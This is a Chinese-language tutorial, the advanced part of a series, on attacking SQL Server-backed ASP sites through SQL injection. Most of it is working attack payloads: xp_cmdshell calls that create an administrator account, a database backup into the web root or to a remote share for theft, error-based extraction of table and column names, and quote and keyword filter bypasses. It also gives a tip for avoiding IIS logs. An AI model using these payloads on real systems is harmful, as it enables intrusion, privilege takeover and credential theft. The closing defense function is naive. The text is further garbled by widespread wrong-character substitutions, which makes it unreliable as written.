SQL注入漏洞全接触--高级篇

　　看完入门篇和进阶篇后，稍加练习，破解通常的网站是没问题了。但若是碰到表名列名猜不到，或程序做者过滤了一些特殊字符，怎么提升注入的成功率?怎么样提升猜解效率?请你们接着往下看高级篇。

　　第一节、利用系统表注入SQLServer数据库

　　SQLServer是一个功能强大的数据库系统，与操做系统也有紧密的联系，这给开发者带来了很大的方便，但另外一方面，也为注入者提供了一个跳板，咱们先来看看几个具体的例子：

　　① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--

　　分号;在SQLServer中表示隔开先后两句语句，--表示后面的语句为注释，因此，这句语句在SQLServer中将被分红两句执行，先是Select出ID=1的记录，而后执行存储过程xp_cmdshell，这个存储过程用于调用系统命令，因而，用net命令新建了用户名为name、密码为password的windows的账号，接着：

　　② http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--

　　将新建的账号name加入管理员组，不用两分钟，你已经拿到了系统最高权限!固然，这种方法只适用于用sa链接数据库的状况，不然，是没有权限调用xp_cmdshell的。

　　③ http://Site/url.asp?id=1 ;;and db_name()>0

　　前面有个相似的例子and user>0，做用是获取链接用户名，db_name()是另外一个系统变量，返回的是链接的数据库名。

　　④ http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:inetpubwwwroot1.db’;--

　　这是至关狠的一招，从③拿到的数据库名，加上某些IIS出错暴露出的绝对路径，将数据库备份到Web目录下面，再用HTTP把整个数据库就完完整整的下载回来，全部的管理员及用户密码都一览无遗!在不知道绝对路径的时候，还能够备份到网络地址的方法(如\202.96.xx.xxShare1.db)，但成功率不高。

　　⑤ http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0

　　前面说过，sysobjects是SQLServer的系统表，存储着全部的表名、视图、约束及其它对象，xtype=’U’ and status>0，表示用户创建的表名，上面的语句将第一个表名取出，与0比较大小，让报错信息把表名暴露出来。第2、第三个表名怎么获取?仍是留给咱们聪明的读者思考吧。

　　⑥ http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0

　　从⑤拿到表名后，用object_id(‘表名’)获取表名对应的内部ID，col_name(表名ID,1)表明该表的第1个字段名，将1换成2,3,4...就能够逐个获取所猜解表里面的字段名。

　　以上6点是我研究SQLServer注入半年多以来的心血结晶，能够看出，对SQLServer的了解程度，直接影响着成功率及猜解速度。在我研究SQLServer注入以后，我在开发方面的水平也获得很大的提升，呵呵，也许安全与开发原本就是相辅相成的吧。

　　第二节、绕过程序限制继续注入

　　在入门篇提到，有不少人喜欢用’号测试注入漏洞，因此也有不少人用过滤’号的方法来“防止”注入漏洞，这也许能挡住一些入门者的攻击，但对SQL注入比较熟悉的人，仍是能够利用相关的函数，达到绕过程序限制的目的。

　　在“SQL注入的通常步骤”一节中，我所用的语句，都是通过我优化，让其不包含有单引号的;在“利用系统表注入SQLServer数据库”中，有些语句包含有’号，咱们举个例子来看看怎么改造这些语句：

　　简单的如where xtype=’U’，字符U对应的ASCII码是85，因此能够用where xtype=char(85)代替;若是字符是中文的，好比where name=’用户’，能够用where name=nchar(29992)+nchar(25143)代替。

　　第三节、经验小结

　　1.有些人会过滤Select、Update、Delete这些关键字，但恰恰忘记区分大小写，因此你们能够用selecT这样尝试一下。

　　2.在猜不到字段名时，不妨看看网站上的登陆表单，通常为了方便起见，字段名都与表单的输入框取相同的名字。

　　3.特别注意：地址栏的+号传入程序后解释为空格，%2B解释为+号，%25解释为%号，具体能够参考URLEncode的相关介绍。

　　4.用Get方法注入时，IIS会记录你全部的提交字符串，对Post方法作则不记录，因此能用Post的网址尽可能不用Get。

　　5. 猜解Access时只能用Ascii逐字解码法，SQLServer也能够用这种方法，只须要二者之间的区别便可，可是若是能用SQLServer的报错信息把值暴露出来，那效率和准确率会有极大的提升。

　　防 范 方 法

　　SQL注入漏洞可谓是“千里之堤，溃于蚁穴”，这种漏洞在网上极为广泛，一般是因为程序员对注入不了解，或者程序过滤不严格，或者某个参数忘记检查致使。在这里，我给你们一个函数，代替ASP中的Request函数，能够对一切的SQL注入Say NO，函数以下：

　　Function SafeRequest(ParaName,ParaType)

　　'--- 传入参数 ---

　　'ParaName:参数名称-字符型

　　'ParaType:参数类型-数字型(1表示以上参数是数字，0表示以上参数为字符)

　　Dim ParaValue

　　ParaValue=Request(ParaName)

　　If ParaType=1 then

　　If ParaValue="" or not isNumeric(ParaValue) then

　　Response.write "参数" & ParaName & "必须为数字型!"

　　Response.end

　　End if

　　Else

　　ParaValue=replace(ParaValue,"'","''")

　　End if

　　SafeRequest=ParaValue

　　End function

　　文章到这里就结束了，无论你是安全人员、技术爱好者仍是程序员，我都但愿本文能对你有所帮助